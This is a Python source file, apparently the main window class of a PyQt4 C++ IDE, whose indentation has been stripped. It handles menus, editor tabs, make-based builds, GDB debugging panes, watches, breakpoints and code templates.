m.addAction(QtGui.QAction('&Fonts',self,triggered=self.settingsFonts))
m.addAction(QtGui.QAction('&Editor',self,triggered=self.settingsEditor))
m.addAction(QtGui.QAction('&Templates',self,triggered=self.settingsTemplates))
m.addAction(QtGui.QAction('&Plugins',self,triggered=self.settingsPlugins))
m=bar.addMenu('&Tools')
pm=m.addMenu('&Plugins')
self.plugins.addToMenu(pm)
def onViewPaneWorkspace(self):
self.paneWorkspace.show()
def onViewPaneOutput(self):
self.paneOutput.show()
def onViewNextTab(self):
count=self.central.count()
if count>0:
if len(self.tabOrder)!=count:
self.tabOrder=range(0,self.central.count())
if self.central.currentIndex() == self.tabOrder[0]:
self.tabOrder=self.tabOrder[1:]+self.tabOrder[:1]
self.central.setCurrentIndex(self.tabOrder[0])
def setupContextMenuItems(self):
self.contextMenuItems={
'all':[
QtGui.QAction('Toggle Breakpoint',self,triggered=self.contextToggleBreakpoint)
],
'files':[
QtGui.QAction('Open Header',self,triggered=self.contextOpenHeader)
],
'breakpoints':[
QtGui.QAction('Edit Breakpoint',self,triggered=self.contextEditBreakpoint),
QtGui.QAction('Dis/Enable Breakpoint',self,triggered=self.contextAbleBreakpoint)
],
'symbols':[
QtGui.QAction('Goto Definition',self,triggered=self.contextGotoDefinition)
]
}
def insertContextMenuItems(self,editor,menu):
first=None
acts=menu.actions()
if len(acts)>0:
first=acts[0]
actions=list(self.contextMenuItems.get('all'))
path=editor.path
line=editor.contextMenuLine
word=editor.contextMenuWord
self.context=(path,line,word)
if len(word)>0:
actions.extend(self.contextMenuItems.get('symbols'))
if self.breakpoints.hasBreakpoint(path,line):
actions.extend(self.contextMenuItems.get('breakpoints'))
if self.workspaceTree.exists(editor.contextFilename):
actions.extend(self.contextMenuItems.get('files'))
menu.insertActions(first,actions)
menu.insertSeparator(first)
def contextGotoDefinition(self):
src=os.path.join(self.workspaceTree.root,'src')
intr=os.path.join(self.workspaceTree.root,'.intr')
srcpath=self.context[0]
objpath=''
if srcpath.startswith(src) and is_src_ext(srcpath):
rel=srcpath[len(src):]
rel=rel[1:-4]+'.o'
objpath=os.path.join(intr,rel)
(dir,name)=os.path.split(objpath)
objpath=os.path.join(dir,'Debug',name)
if srcpath.startswith(self.workspaceTree.root) and srcpath.endswith('.h'):
dir=self.workspaceTree.mainPath()
mkPath=os.path.join(dir,'Makefile')
objpath=utils.objForHeader(mkPath,srcpath)
if len(objpath)>0:
try:
s=dwarf.DwarfSymbols(objpath)
(path,line)=s.find(self.context[2])
if len(path)>0:
self.goToSource(path,line,1)
except IOError:
utils.message('Project must first be compiled in Debug')
def contextToggleBreakpoint(self):
e=self.central.currentWidget()
self.breakpoints.toggleBreakpoint(e)
e.update()
def contextEditBreakpoint(self):
e=self.central.currentWidget()
path=e.path
line=e.contextMenuLine
bp=self.breakpoints.getBreakpoint(path,line)
if bp:
d=BreakpointDialog()
d.condition.setText(bp.condition())
utils.setCheckbox(d.enabled,bp.isEnabled())
if d.exec_():
bp.setCondition(d.condition.text())
bp.able(utils.getCheckbox(d.enabled))
self.breakpoints.update()
e.update()
def contextAbleBreakpoint(self):
e=self.central.currentWidget()
path=e.path
line=e.contextMenuLine
bp=self.breakpoints.getBreakpoint(path,line)
if bp:
if bp.isEnabled():
bp.disable()
else:
bp.enable()
self.breakpoints.update()
e.update()
def contextOpenHeader(self):
e=self.central.currentWidget()
filename=self.workspaceTree.exists(e.contextFilename)
if filename:
self.workspaceTree.openFile(filename)
def markToggleBreakpoint(self,line):
e=self.central.currentWidget()
#path=e.path
self.breakpoints.toggleBreakpoint(e)
e.update()
def createPluginCuror(self):
from pcursor import PluginCursor
e=self.central.currentWidget()
if e:
return PluginCursor(e.textCursor())
return None
def setupToolbar(self,rootDir):
""" Creates the application main toolbar """
tb=self.addToolBar('Actions')
tb.setObjectName("Toolbar")
tb.addAction(utils.loadIcon('gear'),'Generate Makefiles').triggered.connect(self.generate)
self.configCombo=self.createConfigCombo(tb)
tb.addWidget(self.configCombo)
tb.addAction(utils.loadIcon('step.png'),'Step').triggered.connect(self.actStep)
tb.addAction(utils.loadIcon('next.png'),'Next').triggered.connect(self.actNext)
tb.addAction(utils.loadIcon('out.png'),'Out').triggered.connect(self.actOut)
tb.addAction(utils.loadIcon('cont.png'),'Continue').triggered.connect(self.actCont)
tb.addAction(utils.loadIcon('break.png'),'Break').triggered.connect(self.actBreak)
tb.addAction(utils.loadIcon('stop.png'),'Stop').triggered.connect(self.actStop)
self.createTemplatesCombo(tb)
tb.addWidget(self.tmplCombo)
def exitApp(self):
self.close()
def nextError(self):
e=self.outputEdit.getNextError()
if e:
self.showStatus(e[3])
self.goToSource(e[0],e[1],e[2],'#ff8080')
self.outputEdit.highlightLine(e[4])
def onCopy(self):
(e,p)=self.currentEditor()
if e:
e.copy()
def onCut(self):
(e,p)=self.currentEditor()
if e:
e.cut()
def onPaste(self):
(e,p)=self.currentEditor()
if e:
e.paste()
def onFindReplace(self):
(e,p)=self.currentEditor()
if e:
from finddlg import FindDialog
d=FindDialog(self)
c=e.textCursor()
if c.hasSelection:
d.setFindText(c.selectedText())
if d.exec_():
self.findDetails=d.details
self.onFindNext()
def onFindNext(self):
(e,p)=self.currentEditor()
if e and self.findDetails:
flags=QtGui.QTextDocument.FindFlags()
if not self.findDetails.get('find_case'):
flags = flags | QtGui.QTextDocument.FindCaseSensitively
if self.findDetails.get('find_words'):
flags = flags | QtGui.QTextDocument.FindWholeWords
if self.findDetails.get('find_back'):
flags = flags | QtGui.QTextDocument.FindBackward
text=self.findDetails.get('find_text')
replaceText=self.findDetails.get('find_replace_text')
replace=self.findDetails.get('find_replace')
all=self.findDetails.get('find_all')
if all and replace:
while e.find(text,flags):
e.textCursor().insertText(replaceText)
elif e.find(text,flags):
if replace:
e.textCursor().insertText(replaceText)
def settingsTemplates(self):
""" Show the code templates editing dialog """
from settings import TemplatesDialog
d=TemplatesDialog()
if d.exec_():
d.save()
self.updateTemplates()
def settingsPlugins(self):
""" Show the python plugins settings dialog """
from plugins import PluginsDialog
d=PluginsDialog()
if d.exec_():
d.save()
def settingsGeneral(self):
""" Show the general settings """
from settings import GeneralSettingsDialog
d=GeneralSettingsDialog()
if d.exec_():
d.save()
self.updateGeneralSettings()
def settingsEditor(self):
""" Show the editor settings """
from settings import EditorSettingsDialog
d=EditorSettingsDialog()
if d.exec_():
d.save()
self.updateEditorsSettings()
def settingsFonts(self):
""" Edit the font settings for the code window and various panes """
from settings import FontSettingsDialog
d=FontSettingsDialog()
if d.exec_():
self.setAllFonts()
def loadFont(self,name,target):
""" Load previously saved font settings """
settings=QtCore.QSettings()
if settings.contains(name):
fb=settings.value(name).toByteArray()
buf=QtCore.QBuffer(fb)
buf.open(QtCore.QIODevice.ReadOnly)
font=QtGui.QFont()
QtCore.QDataStream(fb) >> font
target.setFont(font)
else:
target.setFont(QtGui.QFont('Monospace',14))
def setAllFonts(self):
""" Apply fonts to the various sub-windows """
for e in self.editors:
self.loadFont('codefont',self.editors.get(e))
#self.loadFont('watchesfont',self.watchesTree)
#self.loadFont('watchesfont',self.stackList)
self.loadFont('watchesfont',self.outputEdit)
self.loadFont('sourcesfont',self.workspaceTree)
def updateGeneralSettings(self):
""" Apply general settings """
s=QtCore.QSettings()
sortFiles=s.value('sortFiles',True).toBool()
self.workspaceTree.setSorting(sortFiles)
def updateEditorsSettings(self):
""" Apply editor settings to all open tabs """
s=QtCore.QSettings()
indent=(s.value('indent',2).toInt())[0]
clang=s.value('clangCompletion',True).toBool()
for e in self.editors:
self.editors.get(e).indentWidth=indent
self.editors.get(e).clangCompletion=clang
def updateTemplates(self):
self.tmplCombo.clear()
self.tmplCombo.addItem("= Templates =")
d=QtCore.QSettings().value('tmplDir','').toString()
if d:
templates=os.listdir(d)
templates=[os.path.splitext(t)[0] for t in templates if t.endswith('.template')]
for t in templates:
self.tmplCombo.addItem(t)
def showStatus(self,status):
self.statusBar().showMessage(status)
def findUndefinedReferences(self,output):
"""
Search the linker output to find undefined reference
errors, and collect the missing symbol names
"""
undefined=set()
base='undefined reference to '
if output:
for line in output:
p=line.find(base)
if p>0:
name=line[(p+len(base)):]
if name.startswith('symbol '):
name=name[8:]
else:
name=name[1:]
p=name.find('(')
if p>0:
name=name[0:p]
else:
name=name[0:len(name)-1]
p=name.find('@')
if p>0:
name=name[0:p]
undefined.add(name)
return undefined
def toggleAdded(self,item):
if item.checkState():
self.added.add(item.text())
else:
self.added.remove(item.text())
def attemptUndefResolution(self,undefs):
if not self.symbolScan:
return
from system import getLibrarySymbols, getWorkspaceSymbols
suggested={}
syms=getLibrarySymbols()
wsSyms=getWorkspaceSymbols()
for sym in undefs:
words=sym.split(':')
words=[w for w in words if w]
words.append(sym)
for word in words:
if word in syms:
s=syms.get(word)
for l in s:
if not l in suggested:
suggested[l]=1
else:
n=suggested.get(l)+1
suggested[l]=n
if word in wsSyms:
s=wsSyms.get(word)
for l in s:
if not l in suggested:
suggested[l]=1
else:
n=suggested.get(l)+1
suggested[l]=n
self.added=set()
if len(suggested)>0:
d=uis.loadDialog('libsuggest')
model = QtGui.QStandardItemModel(d.libsList)
for s in suggested:
item=QtGui.QStandardItem(s)
item.setCheckable(True)
model.appendRow(item)
d.libsList.setModel(model)
model.itemChanged.connect(lambda item : self.toggleAdded(item))
if d.exec_():
self.workspaceTree.addLibrariesToProject(self.added)
def buildSettings(self,path=''):
from buildsettings import BuildSettingsDialog
if not path:
path=self.workspaceTree.mainPath()
if not path:
path=self.workspaceTree.root
d=BuildSettingsDialog(self,path)
d.exec_()
self.generateQueue.add(path)
def checkBuildOutput(self):
if self.buildProcess:
self.processBuildOutput(self.buildProcess.text)
self.buildProcess=None
def pollAsync(self):
rcs=utils.pollAsync()
if len(rcs)>0:
if rcs[0]==0:
utils.appendColorLine(self.outputEdit,"Success...",'#008020')
else:
utils.appendColorLine(self.outputEdit,"= Failed ({}) =".format(rcs[0]),'#ff0000')
self.checkBuildOutput()
self.asyncPollTimer.stop()
self.showStatus("Done")
def execute(self,path,cmd,*args):
if utils.pendingAsync():
self.showStatus('Busy')
return None
self.outputEdit.clearAll()
p=utils.execute(self.outputEdit,path,cmd,*args)
if not self.asyncPollTimer.isActive():
self.asyncPollTimer.start(10)
return p
def buildSpecific(self,path):
self.saveAll()
self.autoGenerate()
if len(path)>0:
self.showStatus("Building "+os.path.basename(path))
s=QtCore.QSettings()
if s.value('parallel_make',False).toBool():
self.buildProcess=self.execute(path,'/usr/bin/make','-j','3',self.config)
else:
self.buildProcess=self.execute(path,'/usr/bin/make',self.config)
def processBuildOutput(self,output):
undefs=self.findUndefinedReferences(output)
if len(undefs)>0:
self.attemptUndefResolution(undefs)
def build(self):
self.buildSpecific(self.workspaceTree.mainPath())
def cleanSpecific(self,path):
if len(path)>0:
self.execute(path,'/usr/bin/make','clean_{}'.format(self.config))
def clean(self):
self.cleanSpecific(self.workspaceTree.mainPath())
def rebuildSpecific(self,path):
if len(path)>0:
cfg=self.config
self.showStatus("Rebuilding "+os.path.basename(path))
self.buildProcess=self.execute(path,'/usr/bin/make','clean_'+cfg,cfg)
def rebuild(self):
self.rebuildSpecific(self.workspaceTree.mainPath())
def autoGenerateRun(self):
for path in self.generateQueue:
genmake.generateDirectory(self.workspaceTree.root,path)
self.generateQueue.clear()
self.showStatus('Ready')
def autoGenerate(self):
if len(self.generateQueue)>0:
self.showStatus('Generating Makefiles')
self.timerCall=self.autoGenerateRun
else:
if genmake.genThreadDone():
self.showStatus("Makefile Generate Done")
def waitForScanner(self):
if self.symbolScan:
import system
import time
while not system.isScannerDone():
time.sleep(1)
def timer1000(self):
e=self.central.currentWidget()
if e:
updates=self.breakpoints.updateLineNumbers(e.path)
for path in updates:
e=self.editors.get(path)
if e:
e.update()
if self.timerCall:
f=self.timerCall
self.timerCall=None
f()
self.autoGenerate()
#if self.statusBar().currentMessage() == MainWindow.LIBRARY_SCAN:
if self.symbolScan:
import system
if system.isScannerDone():
#if system.scanq and not system.scanq.empty():
if self.statusBar().currentMessage() == MainWindow.LIBRARY_SCAN:
self.showStatus('Ready')
system.getLibrarySymbols()
def timer5000(self):
import scm
res=scm.scan(self.workspaceTree.root)
if res:
new_scm_mods=[]
for (name,status) in res:
path=os.path.join(self.workspaceTree.root,name)
if path in self.workspaceTree.fileItems:
item=self.workspaceTree.fileItems.get(path)
if status=='Modified':
item.setForeground(0,QtGui.QBrush(QtGui.QColor(255,0,0)))
elif status=='Staged':
item.setForeground(0,QtGui.QBrush(QtGui.QColor(0,255,0)))
new_scm_mods.append(item)
for item in self.scm_mods:
if not item in new_scm_mods:
item.setForeground(0,QtGui.QBrush(QtGui.QColor(0,0,0)))
self.scm_mods=new_scm_mods
for path in self.editors:
last=self.file_times.get(path)
cur=os.path.getmtime(path)
if cur!=last:
self.file_times[path]=cur
res=QtGui.QMessageBox.question(self,'File changed','Reload {}'.format(path),QtGui.QMessageBox.Yes,QtGui.QMessageBox.No)
if res==QtGui.QMessageBox.Yes:
text=''.join(open(path,'r').readlines())
self.editors.get(path).text=text
def generateAllInThread(self):
genmake.generateTree(self.workspaceTree.root,False)
def generateAll(self):
genmake.generateTree(self.workspaceTree.root,True)
def generate(self):
mb=QtGui.QMessageBox()
mb.setText("Generate make files")
mb.setInformativeText("Overwrite all make files?")
mb.setStandardButtons(QtGui.QMessageBox.Yes|QtGui.QMessageBox.No)
mb.setDefaultButton(QtGui.QMessageBox.Yes)
rc=mb.exec_()
if rc==QtGui.QMessageBox.Yes:
self.generateAll()
utils.message("Done")
def createHelloWorldProject(self,dir):
try:
os.makedirs(dir)
except OSError:
pass
mainpath=os.path.join(dir,'main.cpp')
f=open(mainpath,"w")
f.write('#include <iostream>\n\n\nint main(int argc, char* argv[])\n')
f.write('{\n std::cout << "Hello World" << std::endl;\n return 0;\n}\n')
f.close()
self.workspaceTree.update()
genmake.generateDirectory(self.workspaceTree.root,dir)
self.workspaceTree.setMainPath(dir)
def initWorkspace(self):
d=QtGui.QFileDialog()
d.setFileMode(QtGui.QFileDialog.Directory)
d.setOption(QtGui.QFileDialog.ShowDirsOnly)
if d.exec_():
ws=(d.selectedFiles())[0]
os.makedirs(os.path.join(ws,'include'))
dir=os.path.join(ws,'src','hello')
self.workspaceTree.setWorkspacePath(ws)
self.createHelloWorldProject(dir)
self.workspaceTree.saveSettings()
self.generateAll()
def updateRecents(self):
ws=self.workspaceTree.root
if ws in self.recent_ws:
del self.recent_ws[self.recent_ws.index(ws)]
self.recent_ws.insert(0,ws)
while len(self.recent_ws)>4:
del self.recent_ws[-1]
s=QtCore.QSettings()
s.setValue('recent_ws',':'.join(self.recent_ws))
s.sync()
self.recents_menu.clear()
handlers=[partial(self.openRecent,w) for w in self.recent_ws]
for ws,h in zip(self.recent_ws,handlers):
self.recents_menu.addAction(QtGui.QAction(ws,self,triggered=h))
def openRecent(self,ws):
self.workspaceTree.saveTabs(self.central)
self.closeAllTabs()
self.workspaceTree.setWorkspacePath(ws)
#self.generateAll()
self.loadTabs()
self.waitForScanner()
import symbolscanner
symbolscanner.setWorkspacePath(ws)
self.updateRecents()
def openWorkspace(self):
d=QtGui.QFileDialog()
d.setFileMode(QtGui.QFileDialog.Directory)
d.setOption(QtGui.QFileDialog.ShowDirsOnly)
if d.exec_():
ws=(d.selectedFiles())[0]
self.openRecent(ws)
def saveTabFile(self,index):
n=self.central.tabBar().count()
if index>=0 and index<n:
path=self.central.tabToolTip(index)
editor=self.editors.get(path)
if editor:
doc=editor.document()
if doc.isModified():
f=open(path,'w')
if not f:
utils.errorMessage('Cannot write file: {}'.format(path))
return
f.write(doc.toPlainText())
f.close()
doc.setModified(False)
self.file_times[path]=os.path.getmtime(path)
#dir=os.path.dirname(path)
#self.generateQueue.add(dir)
if self.symbolScan:
from system import getLibrarySymbols
getLibrarySymbols()
from symbolscanner import rescanOnFileSave
rescanOnFileSave(path)
def saveFile(self):
n=self.central.tabBar().count()
if n>0:
self.saveTabFile(self.central.currentIndex())
def saveAll(self):
n=self.central.tabBar().count()
for i in xrange(0,n):
self.saveTabFile(i)
def saveAsFile(self):
pass
def closeAllTabs(self):
while self.central.count()>0:
if not self.closeTab(0):
return False
return True
def tabChanged(self,index):
for i in xrange(0,len(self.tabOrder)):
if self.tabOrder[i]==index:
self.tabOrder=self.tabOrder[i:]+self.tabOrder[:i]
break
def closeTab(self,index):
path=self.central.tabToolTip(index)
editor=self.editors.get(path)
if editor:
doc=editor.document()
if doc.isModified():
mb = QtGui.QMessageBox()
mb.setText("{} has been modified.".format(os.path.basename(path)))
mb.setInformativeText("Do you want to save your changes?")
mb.setStandardButtons(QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard | QtGui.QMessageBox.Cancel)
mb.setDefaultButton(QtGui.QMessageBox.Save)
rc = mb.exec_()
if rc == QtGui.QMessageBox.Save:
f=open(path,'w')
if not f:
utils.errorMessage('Cannot write file: {}'.format(path))
return False
f.write(doc.toPlainText())
f.close()
elif rc == QtGui.QMessageBox.Cancel:
return False
del self.editors[path]
del self.file_times[path]
self.central.removeTab(index)
return True
def closeFile(self):
n=self.central.tabBar().count()
if n>0:
index=self.central.currentIndex()
return self.closeTab(index)
return False
def currentEditor(self):
if self.central.count()>0:
cur=self.central.currentIndex()
path=self.central.tabToolTip(cur)
if path in self.editors:
return (self.editors.get(path),path)
return (None,None)
def templateSelected(self,index):
(editor,path)=self.currentEditor()
if index>0 and editor:
template=self.tmplCombo.itemText(index)
d=QtCore.QSettings().value('tmplDir','').toString()
if d:
tpath=os.path.join(d,template+".template")
try:
f=open(tpath,'r')
code=f.read()
if code:
cursor=editor.textCursor()
props=Properties()
props.assign('PATH',path)
base=os.path.basename(path)
props.assign('FILENAME',base)
p=base.find('.')
if (p>0):
props.assign('FILEBASE',base[0:p])
props.assign('SELECTION',cursor.selectedText())
cursor.removeSelectedText()
import templates
text=templates.generateCode(code,props)
cursor.insertText(text)
except IOError:
utils.errorMessage("Cannot read file: {}".format(path))
self.tmplCombo.setCurrentIndex(0)
def showWorkspacePane(self):
""" Creates a docking pane that shows a list of source files """
self.paneWorkspace=QtGui.QDockWidget("Workspace",self)
self.paneWorkspace.setObjectName("Workspace")
self.paneWorkspace.setAllowedAreas(QtCore.Qt.LeftDockWidgetArea|QtCore.Qt.RightDockWidgetArea)
self.workspaceTree=WorkSpace(self.paneWorkspace,self)
self.workspaceTree.depsChanged.connect(lambda path: self.generateQueue.add(path))
self.paneWorkspace.setWidget(self.workspaceTree)
self.addDockWidget(QtCore.Qt.LeftDockWidgetArea,self.paneWorkspace)
self.updateWorkspace()
self.workspaceTree.doubleClicked.connect(self.docDoubleClicked)
self.showStatus(MainWindow.LIBRARY_SCAN)
if self.symbolScan:
from system import startSymbolScan
startSymbolScan(self.workspaceTree.root)
else:
from system import disableSymbolScan
disableSymbolScan()
self.updateRecents()
def updateWorkspace(self):
self.workspaceTree.update()
def setActiveSourceFile(self,path):
if path in self.editors:
editor=self.editors.get(path)
n=self.central.tabBar().count()
for i in xrange(0,n):
if self.central.widget(i) == editor:
self.central.tabBar().setCurrentIndex(i)
return True
return False
def fixPath(self,path):
if path.startswith(self.rootDir):
path=os.path.relpath(path,self.rootDir)
return path
'''
Makes the path given the active source file in the editor.
If the file is already open, it is made active.
If not, it is opened and made active.
Function returns true if the file is found and opened
'''
def openSourceFile(self,path):
path=self.fixPath(path)
if self.setActiveSourceFile(path):
return True
else:
try:
f=open(path,"r")
if not f:
return False
lines=f.readlines()
if lines:
firstLine=lines[0]
s=QtCore.QSettings()
editor=qutepart.Qutepart()
editor.setPath(path)
editor.detectSyntax(sourceFilePath=path, firstLine=firstLine)
editor.lineLengthEdge = 1024
editor.drawIncorrectIndentation = True
editor.drawAnyWhitespace = False
editor.indentUseTabs = False
editor.indentWidth = (s.value('indent',2).toInt())[0]
editor.text="".join(lines)
editor.setLineWrapMode(QtGui.QPlainTextEdit.NoWrap)
editor.setWorkspace(self.workspaceTree)
editor.setMainWindow(self)
index=self.central.addTab(editor,os.path.basename(path))
self.central.setTabToolTip(index,path)
self.editors[path]=editor
self.file_times[path]=os.path.getmtime(path)
self.loadFont('codefont',editor)
self.central.tabBar().setCurrentIndex(index)
bps=self.breakpoints.pathBreakpoints(path)
editor.bpMarks=bps
editor._markArea.blockDoubleClicked.connect(self.markToggleBreakpoint)
return True
except IOError:
return False
return False
def docDoubleClicked(self,index):
item=self.workspaceTree.currentItem()
path=item.data(0,FileRole).toString()
if len(path)>0:
self.openSourceFile(path)
if path in self.editors:
self.editors.get(path).setFocus(QtCore.Qt.MouseFocusReason)
def goToSource(self,path,row,col,color=''):
"""
Given a file path, and a position within, open a tab
or switch to an already open tab, and scroll to that
position. Usually useful to find references or
compiler error positions
"""
path=self.fixPath(path)
if self.openSourceFile(path):
editor=self.editors.get(path)
if editor:
self.setActiveSourceFile(path)
c=editor.textCursor()
c.movePosition(QtGui.QTextCursor.Start)
c.movePosition(QtGui.QTextCursor.Down,n=row-1)
c.movePosition(QtGui.QTextCursor.Right,n=col-1)
editor.setTextCursor(c)
editor.ensureCursorVisible()
if len(color)>0:
editor.colorLine(row,color)
def showCallStackPane(self):
self.paneStack=QtGui.QDockWidget("Call Stack",self)
self.paneStack.setObjectName("CallStack")
self.paneStack.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea)
self.stackList=QtGui.QListWidget(self.paneStack)
self.paneStack.setWidget(self.stackList)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,self.paneStack)
self.loadFont('watchesfont',self.stackList)
self.stackList.itemDoubleClicked.connect(self.stackItemDoubleClicked)
def showLocalsPane(self):
self.paneLocals=QtGui.QDockWidget("Locals",self)
self.paneLocals.setObjectName("Locals")
self.paneLocals.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea)
self.localsTree=WatchesTree(self.paneLocals)
self.localsTree.setColumnCount(2)
self.localsTree.setHeaderLabels(['Name','Value'])
self.paneLocals.setWidget(self.localsTree)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,self.paneLocals)
self.loadFont('watchesfont',self.watchesTree)
def showWatchesPane(self):
self.paneWatches=QtGui.QDockWidget("Watches",self)
self.paneWatches.setObjectName("Watches")
self.paneWatches.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea)
self.watchesTree=WatchesTree(self.paneWatches)
self.watchesTree.setColumnCount(2)
self.watchesTree.setHeaderLabels(['Name','Value'])
self.paneWatches.setWidget(self.watchesTree)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,self.paneWatches)
self.loadFont('watchesfont',self.watchesTree)
self.watchesTree.addTopLevelItem(QtGui.QTreeWidgetItem(['* Double-Click for new watch']))
self.watchesTree.resizeColumnToContents(0)
self.watchesTree.itemDoubleClicked.connect(lambda item,column : self.watchDoubleClicked(item,column))
def showOutputPane(self):
self.paneOutput=QtGui.QDockWidget("Output",self)
self.paneOutput.setObjectName("Output")
self.paneOutput.setAllowedAreas(QtCore.Qt.BottomDockWidgetArea)
self.outputEdit=output.OutputWidget(self.paneOutput,self)
self.outputEdit.setReadOnly(True)
self.paneOutput.setWidget(self.outputEdit)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea,self.paneOutput)
def stackItemDoubleClicked(self,item):
pat='at (.+):(\d+)'
m=re.search(pat,item.text())
if m:
g=m.groups()
path=g[0]
line=int(g[1])
self.goToSource(path,line,1)
else:
row=self.stackList.row(item)
if row<(self.stackList.count()-1):
self.stackItemDoubleClicked(self.stackList.item(row+1))
def watchDoubleClicked(self,item,column):
""" Edits existing watches, or adds a new watch """
changed=False
index=self.watchesTree.indexOfTopLevelItem(item)
if item.text(column)=='* Double-Click for new watch':
res=QtGui.QInputDialog.getText(self,'New Watch','Expression')
expr=res[0]
if len(expr)>0 and res[1]:
self.watchesTree.insertTopLevelItem(index,QtGui.QTreeWidgetItem([expr]))
changed=True
self.updateWatches()
else:
watch=item.text(0)
res=QtGui.QInputDialog.getText(self,"Edit Watch",'Expression',text=watch)
watch=res[0]
if res[1]:
changed=True
if len(watch)>0:
item.setText(0,watch)
self.updateWatches()
else:
self.watchesTree.takeTopLevelItem(index)
if changed:
self.saveWatches()
def createConfigCombo(self,parent):
configCombo=QtGui.QComboBox(parent)
configCombo.addItem("Debug")
configCombo.addItem("Release")
configCombo.currentIndexChanged.connect(self.configChanged)
return configCombo
def createTemplatesCombo(self,parent):
self.tmplCombo=QtGui.QComboBox(parent)
self.tmplCombo.currentIndexChanged.connect(self.templateSelected)
self.updateTemplates()
def configChanged(self,index):
configs=['Debug','Release']
self.config=configs[index]
s=QtCore.QSettings()
s.setValue("config",self.config)
s.sync()
self.workspaceTree.setConfig(self.config)
def addOutputText(self,added):
""" Append the new text captured
Text is appended to the end of existing text and the widget
is scrolled to show the end
"""
text=self.outputEdit.toPlainText()
self.outputEdit.setPlainText(text+added)
c=self.outputEdit.textCursor()
c.movePosition(QtGui.QTextCursor.End)
self.outputEdit.setTextCursor(c)
self.outputEdit.ensureCursorVisible()
def tempScriptPath(self):
"""
Generate a temporary script name. Used for running programs
with an additional wait for key at the end.
"""
from time import time
t=int(time()*10)
return '/tmp/coide_{}.sh'.format(t)
def removeTempScripts(self):
"""
Remove all temporary script files. Called before program
exit
"""
files=os.listdir('/tmp')
files=[f for f in files if f.startswith('coide_')]
for f in files:
os.remove('/tmp/{}'.format(f))
def runProject(self):
if not utils.checkFor('xterm'):
utils.message("xterm not installed")
return
path=self.tempScriptPath()
f=open(path,'w')
dir=self.workspaceTree.getDebugDirectory()
cmd=self.workspaceTree.getExecutablePath()
params=self.workspaceTree.getDebugParams()
if len(params)>0:
cmd=cmd+" "+params
f.write('#!/bin/sh\ncd {}\n{}\nread -r -p "Press any key..." key\n'.format(dir,cmd))
f.close()
os.chmod(path,stat.S_IRUSR|stat.S_IWUSR|stat.S_IXUSR)
utils.run('/tmp','xterm','-fn','10x20','-e',path)
def getCurrentFile(self):
if self.central.count()==0:
return ''
return self.central.tabToolTip(self.central.currentIndex())
def getCurrentEditor(self):
path=self.getCurrentFile()
if len(path)>0:
return self.editors.get(path)
def updatePosition(self):
""" Query current position and update the code view """
changed=False
poslist=self.debugger.getCurrentPos()
if poslist and len(poslist)>0:
for (path,line) in poslist:
if self.getCurrentFile()==path:
if self.currentLine!=line:
changed=True
break
if self.openSourceFile(path):
changed=True
break
e=self.editors.get(path)
if changed and e:
e.colorLine(line,'#0080ff')
e.cursorPosition=(line-1,1)
self.currentLine=line
e.ensureCursorVisible()
def saveWatches(self):
""" Save all watches to settings, for future sessions """
res=[]
n=self.watchesTree.topLevelItemCount()-1
for i in xrange(0,n):
item=self.watchesTree.topLevelItem(i)
if len(res)>0:
res.append(';')
res.append(item.text(0))
settings=QtCore.QSettings()
key='watches:{}'.format(self.debugger.debugged)
settings.setValue(key,''.join(res))
def loadWatches(self):
""" Load all previous session watches from settings """
while self.watchesTree.topLevelItemCount()>1:
self.watchesTree.takeTopLevelItem(0)
settings=QtCore.QSettings()
key='watches:{}'.format(self.debugger.debugged)
val=settings.value(key,'').toString()
if len(val)>0:
arr=val.split(';')
if len(arr)>0:
res=[]
for watch in arr:
res.append(QtGui.QTreeWidgetItem([watch]))
self.watchesTree.insertTopLevelItems(0,res)
def updateLocals(self):
locals=self.debugger.getLocals()
self.localsTree.clear()
for var in locals.keys():
item=QtGui.QTreeWidgetItem([var])
self.localsTree.addTopLevelItem(item)
res=locals.get(var)
if res:
self.updateWatchItem(item,res)
def updateWatches(self):
""" Re-evaluate the value of each watch and update view """
n=self.watchesTree.topLevelItemCount()-1
for i in xrange(0,n):
item=self.watchesTree.topLevelItem(i)
item.takeChildren()
expr=item.text(0)
res=self.debugger.evaluate(expr)
if res:
self.updateWatchItem(item,res)
def updateWatchItem(self,item,root):
item.setText(1,root.value)
def addChildren(item,node):
for c in node.children:
subitem=QtGui.QTreeWidgetItem([c.name])
subitem.setText(1,c.value)
item.addChild(subitem)
addChildren(subitem,c)
addChildren(item,root)
def updateCallstack(self):
bt=self.debugger.getBackTrace()
self.stackList.clear()
for line in bt:
self.stackList.addItem(line)
def startDebug(self):
if self.debugger:
self.actCont()
return
self.outputEdit.setPlainText('')
cmd=[self.workspaceTree.getExecutablePath()]
args=self.workspaceTree.getDebugParams().split()
cwd=self.workspaceTree.getDebugDirectory()
if len(cwd)<1:
cwd=self.workspaceTree.mainPath()
for a in args:
cmd.append(a)
self.debugger=GDBWrapper(self.breakpoints,cmd,cwd)
#self.showWatchesPane()
#self.showCallStackPane()
#self.loadDebugWindowState()
self.showDebugPanes()
self.loadWatches()
self.timer.start(50)
qutepart.evaluator=self.debugger.evaluateAsText
def stopDebugger(self):
if self.debugger:
qutepart.evaluator=None
for path in self.editors:
e=self.editors.get(path)
e.colorLine(0,'')
self.saveDebugWindowState()
self.debugger.quitDebugger()
self.debugger=None
#self.paneWatches.close()
#self.paneWatches=None
#self.paneStack.close()
#self.paneStack=None
self.hideDebugPanes()
self.timer.stop()
def hideDebugPanes(self):
self.paneWatches.hide()
self.paneLocals.hide()
self.paneStack.hide()
def showDebugPanes(self):
self.paneWatches.show()
self.paneLocals.show()
self.paneStack.show()
def clearBreakpoints(self):
self.breakpoints.clear()
n=self.central.count()
for i in xrange(0,n):
self.central.widget(i).bpMarks={}
if self.debugger:
self.debugger.clearBreakpoints()
def actStep(self):
if self.debugger:
self.debugger.actStep()
if not self.debugger.running:
self.stopDebugger()
def actNext(self):
if self.debugger:
self.debugger.actNext()
if not self.debugger.running:
self.stopDebugger()
def actOut(self):
if self.debugger:
self.debugger.actOut()
if not self.debugger.running:
self.stopDebugger()
def actCont(self):
if self.debugger:
e=self.getCurrentEditor()
if e:
e.colorLine(0,'')
self.currentLine=-1
self.debugger.actCont()
